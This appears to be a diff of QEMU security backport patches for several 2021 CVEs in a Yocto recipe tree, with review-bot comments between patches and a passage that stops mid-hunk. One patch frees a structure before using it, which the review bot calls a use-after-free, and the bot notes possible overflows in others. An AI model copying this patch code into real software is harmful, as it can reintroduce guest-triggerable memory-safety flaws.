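+vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544)
+
+Call 'vugbm_buffer_destroy' in error path to avoid resource leak.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-3-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g,
+ g_critical("%s: resource creation failed %d %d %d",
+ __func__, c2d.resource_id, c2d.width, c2d.height);
+ g_free(res);
++ vugbm_buffer_destroy(&res->buffer);
+ cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY;
+ return;
+ }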
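Review bot: The added `vugbm_buffer_destroy(&res->buffer);` runs after `g_free(res);`, so the error path of vg_resource_create_2d hands the destroy routine a pointer into memory that has already been freed. That replaces the leak with a use-after-free, assuming the routine reads the buffer's fields. The two calls should be in the opposite order: `vugbm_buffer_destroy(&res->buffer);` followed by `g_free(res);`. vg_resource_create_2d starts and ends outside the hunk.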
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
new file mode 100644
index 0000000000..36cbb127f8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
@@ -0,0 +1,39 @@
1vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544)
2
3
4Check whether the 'res' has already been attach_backing to avoid
5memory leak.
6
7Fixes: CVE-2021-3544
8Reported-by: default avatarLi Qiang <liq3ea@163.com>
9virtio-gpu fix: 204f01b3
10
11 ("virtio-gpu: fix memory leak
12 in resource attach backing")
13 Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
14 Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
15 Message-Id: <20210516030403.107723-4-liq3ea@163.com>
16 Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
17
18Upstream-Status: Backport
19[vhost-user-gpu does not exist in 4.2.0 context]
20CVE: CVE-2021-3544
21Signed-off-by: Armin Kuster <akuster@mvista.com>
22
23
24Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
25===================================================================
26--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
27+++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
28@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g,
29 return;
30 }
31
32+ if (res->iov) {
33+ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
34+ return;
35+ }
36+
37 ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov);
38 if (ret != 0) {
39 cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
new file mode 100644
index 0000000000..c534f4c24f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
@@ -0,0 +1,39 @@
1vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544)
2
3If the guest trigger following sequences, the attach_backing will be leaked:
4
5vg_resource_create_2d
6vg_resource_attach_backing
7vg_resource_unref
8
9This patch fix this by freeing 'res->iov' in vg_resource_destroy.
10
11Fixes: CVE-2021-3544
12Reported-by: default avatarLi Qiang <liq3ea@163.com>
13virtio-gpu fix: 5e8e3c4c
14
15("virtio-gpu: fix resource leak
16in virgl_cmd_resource_unref")
17Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
18Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
19Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
20Message-Id: <20210516030403.107723-5-liq3ea@163.com>
21Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
22
23Upstream-Status: Backport
24CVE: CVE-2021-3544
25[vhost-user-gpu does not exist in the 4.2.0]
26Signed-off-by: Armin Kuster <akuster@mvista.com>
27
28Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
29===================================================================
30--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
31+++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
32@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g,
33 }
34
35 vugbm_buffer_destroy(&res->buffer);
36+ g_free(res->iov);
37 pixman_image_unref(res->image);
38 QTAILQ_REMOVE(&g->reslist, res, next);
39 g_free(res);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
new file mode 100644
index 0000000000..96e36eb854
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
@@ -0,0 +1,46 @@
1vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544)
2
3The 'res->iov' will be leaked if the guest trigger following sequences:
4
5virgl_cmd_create_resource_2d
6virgl_resource_attach_backing
7virgl_cmd_resource_unref
8
9This patch fixes this.
10
11Fixes: CVE-2021-3544
12Reported-by: default avatarLi Qiang <liq3ea@163.com>
13virtio-gpu fix: 5e8e3c4c
14
15("virtio-gpu: fix resource leak
16in virgl_cmd_resource_unref"
17Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
18Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
19Message-Id: <20210516030403.107723-6-liq3ea@163.com>
20Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
21
22Upstream-Status: Backport
23CVE: CVE-2021-3544
24Signed-off-by: Armin Kuster <akuster@mvista.com>
25
26Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
27===================================================================
28--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
29+++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
30@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g,
31 struct virtio_gpu_ctrl_command *cmd)
32 {
33 struct virtio_gpu_resource_unref unref;
34+ struct iovec *res_iovs = NULL;
35+ int num_iovs = 0;
36
37 VUGPU_FILL_CMD(unref);
38
39+ virgl_renderer_resource_detach_iov(unref.resource_id,
40+ &res_iovs,
41+ &num_iovs);
42+ g_free(res_iovs);
43+
44 virgl_renderer_resource_unref(unref.resource_id);
45 }
46
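--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
@@ -0,0 +1,47 @@
+From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:01 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory leak in
+ 'virgl_resource_attach_backing' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will
+be leaked.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak
+in resource attach backing")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-7-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
+- virgl_renderer_resource_attach_iov(att_rb.resource_id,
++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id,
+ res_iovs, att_rb.nr_entries);
++ if (ret != 0) {
++ g_free(res_iovs);
++ }
+ }
+
+ static void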
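Review bot: When `virgl_renderer_resource_attach_iov` fails, the new `if (ret != 0)` branch frees `res_iovs` but leaves `cmd->error` untouched, so the guest presumably gets a success response for an attach that did not happen. Setting the error next to the free would make the failure visible, e.g. `cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;`, which is how the vg_resource_attach_backing change in CVE-2021-3544_2.patch reports its failure. The declaration of `ret` and the start of virgl_resource_attach_backing are outside the hunk.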
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
new file mode 100644
index 0000000000..fcdda64437
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
@@ -0,0 +1,41 @@
1From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001
2From: Li Qiang <liq3ea@163.com>
3Date: Sat, 15 May 2021 20:03:56 -0700
4Subject: [PATCH] vhost-user-gpu: fix memory disclosure in
5 virgl_cmd_get_capset_info (CVE-2021-3545)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10Otherwise some of the 'resp' will be leaked to guest.
11
12Fixes: CVE-2021-3545
13Reported-by: Li Qiang <liq3ea@163.com>
14virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak
15in getting capset info dispatch")
16
17Signed-off-by: Li Qiang <liq3ea@163.com>
18Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
19Message-Id: <20210516030403.107723-2-liq3ea@163.com>
20Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
21
22Upstream-Status: Backport
23CVE: CVE-2021-3545
24Signed-off-by: Armin Kuster <akuster@mvista.com>
25
26---
27 contrib/vhost-user-gpu/virgl.c | 1 +
28 1 file changed, 1 insertion(+)
29
30Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
31===================================================================
32--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
33+++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
34@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g,
35
36 VUGPU_FILL_CMD(info);
37
38+ memset(&resp, 0, sizeof(resp));
39 if (info.capset_index == 0) {
40 resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL;
41 virgl_renderer_get_cap_set(resp.capset_id,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
new file mode 100644
index 0000000000..f8da428233
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
@@ -0,0 +1,47 @@
1From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001
2From: Li Qiang <liq3ea@163.com>
3Date: Sat, 15 May 2021 20:04:02 -0700
4Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset'
5 (CVE-2021-3546)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10If 'virgl_cmd_get_capset' set 'max_size' to 0,
11the 'virgl_renderer_fill_caps' will write the data after the 'resp'.
12This patch avoid this by checking the returned 'max_size'.
13
14virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check
15virgl capabilities max_size")
16
17Fixes: CVE-2021-3546
18Reported-by: Li Qiang <liq3ea@163.com>
19Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
20Signed-off-by: Li Qiang <liq3ea@163.com>
21Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
22Message-Id: <20210516030403.107723-8-liq3ea@163.com>
23Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
24
25Upstream-Status: Backport
26CVE: CVE-2021-3546
27Signed-off-by: Armin Kuster <akuster@mvista.com>
28
29---
30 contrib/vhost-user-gpu/virgl.c | 4 ++++
31 1 file changed, 4 insertions(+)
32
33Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
34===================================================================
35--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
36+++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
37@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g,
38
39 virgl_renderer_get_cap_set(gc.capset_id, &max_ver,
40 &max_size);
41+ if (!max_size) {
42+ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
43+ return;
44+ }
45 resp = g_malloc0(sizeof(*resp) + max_size);
46
47 resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET;
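--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
@@ -0,0 +1,47 @@
+From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel@redhat.com>
+Date: Wed, 16 Jun 2021 14:06:00 +0300
+Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device
+ (CVE-2021-3582)
+
+Ensure mremap boundaries not trusting the guest kernel to
+pass the correct buffer length.
+
+Fixes: CVE-2021-3582
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3582
+Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c
+index f59879e257..da7ddfa548 100644
+--- a/hw/rdma/vmw/pvrdma_cmd.c
++++ b/hw/rdma/vmw/pvrdma_cmd.c
+@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma,
+ return NULL;
+ }
+
++ length = ROUND_UP(length, TARGET_PAGE_SIZE);
++ if (nchunks * TARGET_PAGE_SIZE != length) {
++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks,
++ (unsigned long)length);
++ return NULL;
++ }
++
+ dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory");
+--
+2.25.1
+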
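Review bot: The new consistency check `nchunks * TARGET_PAGE_SIZE != length` may be evaluated in 32-bit arithmetic. `nchunks` is printed with `%u`, and if `TARGET_PAGE_SIZE` is an int-sized constant the product can wrap before it is compared with the wider `length`, so a mismatched guest-supplied pair could pass. Widening one operand avoids that: `if ((uint64_t)nchunks * TARGET_PAGE_SIZE != length) {`. `ROUND_UP(length, TARGET_PAGE_SIZE)` can likewise wrap for a `length` near the type's maximum, so rejecting such values before rounding would be safer. The parameter types are declared outside the hunk and should be confirmed.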
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
new file mode 100644
index 0000000000..0547c74484
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
@@ -0,0 +1,43 @@
1From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001
2From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
3Date: Wed, 30 Jun 2021 14:46:34 +0300
4Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607)
5
6Check the guest passed a non zero page count
7for pvrdma device ring buffers.
8
9Fixes: CVE-2021-3607
10Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
11Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
12Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
13Message-Id: <20210630114634.2168872-1-marcel@redhat.com>
14Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
15Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
16Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
17
18CVE: CVE-2021-3607
19Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534]
20Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
21---
22 hw/rdma/vmw/pvrdma_main.c | 5 +++++
23 1 file changed, 5 insertions(+)
24
25diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c
26index 84ae8024fc..7c0c3551a8 100644
27--- a/hw/rdma/vmw/pvrdma_main.c
28+++ b/hw/rdma/vmw/pvrdma_main.c
29@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state,
30 uint64_t *dir, *tbl;
31 int rc = 0;
32
33+ if (!num_pages) {
34+ rdma_error_report("Ring pages count must be strictly positive");
35+ return -EINVAL;
36+ }
37+
38 dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE);
39 if (!dir) {
40 rdma_error_report("Failed to map to page directory (ring %s)", name);
41--
422.25.1
43
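--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
@@ -0,0 +1,40 @@
+From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:52:46 +0300
+Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Do not unmap uninitialized dma addresses.
+
+Fixes: CVE-2021-3608
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630115246.2178219-1-marcel@redhat.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3608
+Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_dev_ring.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+===================================================================
+--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c
++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c
+ atomic_set(&ring->ring_state->cons_head, 0);
+ */
+ ring->npages = npages;
+- ring->pages = g_malloc(npages * sizeof(void *));
++ ring->pages = g_malloc0(npages * sizeof(void *));
+
+ for (i = 0; i < npages; i++) {
+ if (!tbl[i]) {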
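Review bot: `g_malloc0(npages * sizeof(void *))` still sizes the array with an unchecked multiplication. GLib's `g_new0(void *, npages)` zero-fills the same array and aborts on overflow rather than under-allocating. Since `npages` appears to come from a guest-supplied ring page count (see the description of CVE-2021-3607.patch), the checked form is the safer spelling: `ring->pages = g_new0(void *, npages);`. The type of `npages` and the rest of pvrdma_ring_init are outside the hunk.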
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
new file mode 100644
index 0000000000..6e7af8540a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
@@ -0,0 +1,80 @@
1From b68d13531d8882ba66994b9f767b6a8f822464f3 Mon Sep 17 00:00:00 2001
2From: Vivek Kumbhar <vkumbhar@mvista.com>
3Date: Fri, 11 Nov 2022 12:43:26 +0530
4Subject: [PATCH] CVE-2021-3638
5
6Upstream-Status: Backport [https://lists.nongnu.org/archive/html/qemu-devel/2021-09/msg01682.html]
7CVE: CVE-2021-3638
8Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
9
10When building QEMU with DEBUG_ATI defined then running with
11'-device ati-vga,romfile="" -d unimp,guest_errors -trace ati\*'
12we get:
13
14 ati_mm_write 4 0x16c0 DP_CNTL <- 0x1
15 ati_mm_write 4 0x146c DP_GUI_MASTER_CNTL <- 0x2
16 ati_mm_write 4 0x16c8 DP_MIX <- 0xff0000
17 ati_mm_write 4 0x16c4 DP_DATATYPE <- 0x2
18 ati_mm_write 4 0x224 CRTC_OFFSET <- 0x0
19 ati_mm_write 4 0x142c DST_PITCH_OFFSET <- 0xfe00000
20 ati_mm_write 4 0x1420 DST_Y <- 0x3fff
21 ati_mm_write 4 0x1410 DST_HEIGHT <- 0x3fff
22 ati_mm_write 4 0x1588 DST_WIDTH_X <- 0x3fff3fff
23 ati_2d_blt: vram:0x7fff5fa00000 addr:0 ds:0x7fff61273800 stride:2560 bpp:32
24rop:0xff
25 ati_2d_blt: 0 0 0, 0 127 0, (0,0) -> (16383,16383) 16383x16383 > ^
26 ati_2d_blt: pixman_fill(dst:0x7fff5fa00000, stride:254, bpp:8, x:16383,
27y:16383, w:16383, h:16383, xor:0xff000000)
28 Thread 3 "qemu-system-i38" received signal SIGSEGV, Segmentation fault.
29 (gdb) bt
30 #0 0x00007ffff7f62ce0 in sse2_fill.lto_priv () at /lib64/libpixman-1.so.0
31 #1 0x00007ffff7f09278 in pixman_fill () at /lib64/libpixman-1.so.0
32 #2 0x0000555557b5a9af in ati_2d_blt (s=0x631000028800) at
33hw/display/ati_2d.c:196
34 #3 0x0000555557b4b5a2 in ati_mm_write (opaque=0x631000028800, addr=5512,
35data=1073692671, size=4) at hw/display/ati.c:843
36 #4 0x0000555558b90ec4 in memory_region_write_accessor (mr=0x631000039cc0,
37addr=5512, ..., size=4, ...) at softmmu/memory.c:492
38
39Commit 584acf34cb0 ("ati-vga: Fix reverse bit blts") introduced
40the local dst_x and dst_y which adjust the (x, y) coordinates
41depending on the direction in the SRCCOPY ROP3 operation, but
42forgot to address the same issue for the PATCOPY, BLACKNESS and
43WHITENESS operations, which also call pixman_fill().
44
45Fix that now by using the adjusted coordinates in the pixman_fill
46call, and update the related debug printf().
47---
48 hw/display/ati_2d.c | 6 +++---
49 1 file changed, 3 insertions(+), 3 deletions(-)
50
51diff --git a/hw/display/ati_2d.c b/hw/display/ati_2d.c
52index 4dc10ea7..692bec91 100644
53--- a/hw/display/ati_2d.c
54+++ b/hw/display/ati_2d.c
55@@ -84,7 +84,7 @@ void ati_2d_blt(ATIVGAState *s)
56 DPRINTF("%d %d %d, %d %d %d, (%d,%d) -> (%d,%d) %dx%d %c %c\n",
57 s->regs.src_offset, s->regs.dst_offset, s->regs.default_offset,
58 s->regs.src_pitch, s->regs.dst_pitch, s->regs.default_pitch,
59- s->regs.src_x, s->regs.src_y, s->regs.dst_x, s->regs.dst_y,
60+ s->regs.src_x, s->regs.src_y, dst_x, dst_y,
61 s->regs.dst_width, s->regs.dst_height,
62 (s->regs.dp_cntl & DST_X_LEFT_TO_RIGHT ? '>' : '<'),
63 (s->regs.dp_cntl & DST_Y_TOP_TO_BOTTOM ? 'v' : '^'));
64@@ -180,11 +180,11 @@ void ati_2d_blt(ATIVGAState *s)
65 dst_stride /= sizeof(uint32_t);
66 DPRINTF("pixman_fill(%p, %d, %d, %d, %d, %d, %d, %x)\n",
67 dst_bits, dst_stride, bpp,
68- s->regs.dst_x, s->regs.dst_y,
69+ dst_x, dst_y,
70 s->regs.dst_width, s->regs.dst_height,
71 filler);
72 pixman_fill((uint32_t *)dst_bits, dst_stride, bpp,
73- s->regs.dst_x, s->regs.dst_y,
74+ dst_x, dst_y,
75 s->regs.dst_width, s->regs.dst_height,
76 filler);
77 if (dst_bits >= s->vga.vram_ptr + s->vga.vbe_start_addr &&
78--
792.25.1
80
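Review bot: Neither hunk bounds the fill rectangle before `pixman_fill((uint32_t *)dst_bits, dst_stride, bpp, dst_x, dst_y, ...)`; the change only swaps the raw register coordinates for the adjusted `dst_x`/`dst_y`. The trace in the description shows a width and height far larger than the reported stride, so the adjusted origin alone may not keep the fill inside VRAM. If ati_2d_blt does not already validate `dst_x + s->regs.dst_width` and `dst_y + s->regs.dst_height` against the destination surface before this call (not visible here), that guard is still needed. The Upstream-Status line points at a mailing-list post rather than a merged commit, so it is worth checking whether upstream later landed a different fix.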
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
new file mode 100644
index 0000000000..50a49233d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
@@ -0,0 +1,41 @@
1From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Thu, 22 Jul 2021 09:27:56 +0200
4Subject: [PATCH] usbredir: fix free call
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9data might point into the middle of a larger buffer, there is a separate
10free_on_destroy pointer passed into bufp_alloc() to handle that. It is
11only used in the normal workflow though, not when dropping packets due
12to the queue being full. Fix that.
13
14Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491
15Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
16Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
17Message-Id: <20210722072756.647673-1-kraxel@redhat.com>
18
19CVE: CVE-2021-3682
20Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9]
21Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
22---
23 hw/usb/redirect.c | 2 +-
24 1 file changed, 1 insertion(+), 1 deletion(-)
25
26diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
27index 4ec9326e05..1ec909a63a 100644
28--- a/hw/usb/redirect.c
29+++ b/hw/usb/redirect.c
30@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len,
31 if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) {
32 if (dev->endpoint[EP2I(ep)].bufpq_size >
33 dev->endpoint[EP2I(ep)].bufpq_target_size) {
34- free(data);
35+ free(free_on_destroy);
36 return -1;
37 }
38 dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0;
39--
402.25.1
41
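--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
@@ -0,0 +1,67 @@
+From a114d6baedf2cccb454a46d36e399fec1bc3e1c0 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Wed, 18 Aug 2021 14:05:05 +0200
+Subject: [PATCH] uas: add stream number sanity checks.
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The device uses the guest-supplied stream number unchecked, which can
+lead to guest-triggered out-of-band access to the UASDevice->data3 and
+UASDevice->status3 fields. Add the missing checks.
+
+Fixes: CVE-2021-3713
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reported-by: Chen Zhe <chenzhe@huawei.com>
+Reported-by: Tan Jingguo <tanjingguo@huawei.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210818120505.1258262-2-kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/13b250b12ad3c59114a6a17d59caf073ce45b33a
+CVE: CVE-2021-3713
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/dev-uas.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/hw/usb/dev-uas.c b/hw/usb/dev-uas.c
+index 6d6d1073..0b8cd4dd 100644
+--- a/hw/usb/dev-uas.c
++++ b/hw/usb/dev-uas.c
+@@ -830,6 +830,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ }
+ break;
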